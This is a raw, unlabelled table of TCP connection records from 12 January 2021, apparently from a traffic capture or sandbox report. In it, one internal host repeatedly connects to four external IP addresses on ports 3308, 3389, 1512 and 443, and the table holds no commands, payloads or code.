Jan 12, 2021 07:43:56.354675055 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.399823904 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.400059938 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.405400038 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.405566931 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.448659897 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.448955059 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.488847017 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.492446899 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.604790926 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.604820013 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.605143070 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.608964920 CET	49207	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:56.652220964 CET	3308	49207	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:56.720398903 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.774411917 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.774497986 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.775434017 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.830131054 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.850524902 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.850549936 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.850639105 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.859802008 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.919953108 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.920192003 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.929059982 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.929202080 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:56.983052015 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:56.983356953 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:57.022233009 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.037616968 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.037667990 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.127785921 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.127816916 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.127957106 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:57.130861998 CET	49208	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:57.184786081 CET	3389	49208	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:57.235260963 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.288343906 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.288628101 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.289617062 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.342546940 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.349720001 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.349735975 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.349801064 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.360368013 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.414813995 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.415036917 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.421814919 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.422029972 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.474776983 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.475092888 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.513782024 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.527980089 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.629159927 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.629234076 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.629436016 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.638240099 CET	49209	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:57.691231012 CET	1512	49209	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:57.750015974 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.802402020 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:57.802504063 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.803900003 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.855830908 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:57.870600939 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:57.870697021 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.886611938 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.941210032 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:57.941560030 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.952267885 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:57.952617884 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:58.004601955 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.004893064 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:58.042715073 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.056950092 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.176597118 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.176650047 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.176815033 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:58.179507971 CET	49210	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:58.231643915 CET	443	49210	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:58.296191931 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.339514017 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.339575052 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.340395927 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.383497000 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.398276091 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.398300886 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.398328066 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.398355007 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.405339956 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.450290918 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.450371027 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.454381943 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.454535961 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.497591019 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.497734070 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.538038015 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.540800095 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.540821075 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.652682066 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.652704954 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.652906895 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.658102989 CET	49211	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:58.701234102 CET	3308	49211	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:58.768078089 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.822468996 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:58.822561026 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.824071884 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.878031969 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:58.899991989 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:58.900022984 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:58.900110006 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.912045002 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.974678040 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:58.974874973 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.985409021 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:58.985677958 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:59.039422989 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.039695978 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:59.079293013 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.093888998 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.093930960 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.182759047 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.182796955 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.182935953 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:59.189502954 CET	49212	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:59.243324041 CET	3389	49212	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:59.297457933 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.350246906 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.350363970 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.351759911 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.404405117 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.411354065 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.411381006 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.411477089 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.425729990 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.479711056 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.479959011 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.488778114 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.489054918 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.541902065 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.542071104 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.581640959 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.595184088 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.699345112 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.699404001 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.699596882 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.705264091 CET	49213	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:59.757992029 CET	1512	49213	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:59.826210022 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:59.878400087 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:59.878462076 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:59.879784107 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:59.931895018 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:59.946667910 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:59.946729898 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:59.957370043 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.011723042 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.011893988 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.017709970 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.017914057 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.069926977 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.070064068 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.122170925 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.122368097 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.240607023 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.240633011 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.240787029 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.243947983 CET	49214	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:00.298497915 CET	443	49214	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:00.354907036 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.398107052 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.398174047 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.398988962 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.445696115 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.463371992 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.463401079 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.463445902 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.463463068 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.476795912 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.525023937 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.525130987 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.532694101 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.532911062 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.575984001 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.576198101 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.615278959 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.619261980 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.619281054 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.732286930 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.732305050 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.732338905 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.732362032 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.735285044 CET	49215	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:00.778337002 CET	3308	49215	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:00.839514017 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:00.893367052 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:00.893471956 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:00.894341946 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:00.947767019 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:00.965157032 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:00.965177059 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:00.965225935 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:00.974459887 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.035284042 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.035428047 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.040971041 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.041100025 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.095609903 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.095907927 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.135462999 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.149827957 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.149852991 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.241118908 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.241147995 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.241312027 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.241348028 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.247042894 CET	49216	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:01.300735950 CET	3389	49216	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:01.354084015 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.407170057 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.407258034 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.408761978 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.461726904 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.468662977 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.468683958 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.468754053 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.480595112 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.534744978 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.534897089 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.540611029 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.540837049 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.594830990 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.594968081 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.648003101 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.746227980 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.746258974 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.746423006 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.749495029 CET	49217	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:01.802898884 CET	1512	49217	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:01.853341103 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:01.905581951 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:01.905719995 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:01.906725883 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:01.958311081 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:01.972985983 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:01.973077059 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:01.984879971 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.039128065 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.039261103 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.044912100 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.045126915 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.096841097 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.097031116 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.134821892 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.148670912 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.148719072 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.266885996 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.266926050 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.267011881 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.270308018 CET	49218	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:02.322017908 CET	443	49218	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:02.383265972 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.426661015 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.426747084 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.428131104 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.471569061 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.482752085 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.482789993 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.482839108 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.482871056 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.498013020 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.542912960 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.543103933 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.553580999 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.553886890 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.597280979 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.597419024 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.638020039 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.640700102 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.640733004 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.753829956 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.753878117 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.754062891 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.759687901 CET	49219	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:02.803111076 CET	3308	49219	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:02.874907017 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:02.929018974 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:02.929091930 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:02.929990053 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:02.983802080 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.023607016 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.023628950 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.023684978 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.028645992 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.088375092 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.088555098 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.097970009 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.098094940 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.152235031 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.152484894 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.191483974 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.206535101 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.206561089 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.296824932 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.296859980 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.297024965 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.297056913 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.300029993 CET	49220	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:03.355473995 CET	3389	49220	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:03.417109966 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.471404076 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.471498966 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.472790003 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.526051044 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.534075975 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.534116030 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.534193993 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.550554037 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.604762077 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.604968071 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.609838963 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.609983921 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.663044930 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.663294077 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.701780081 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.716402054 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.716418982 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.815048933 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.815108061 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.815257072 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.820921898 CET	49221	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:03.874277115 CET	1512	49221	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:03.930769920 CET	49222	443	192.168.2.22	77.220.64.37
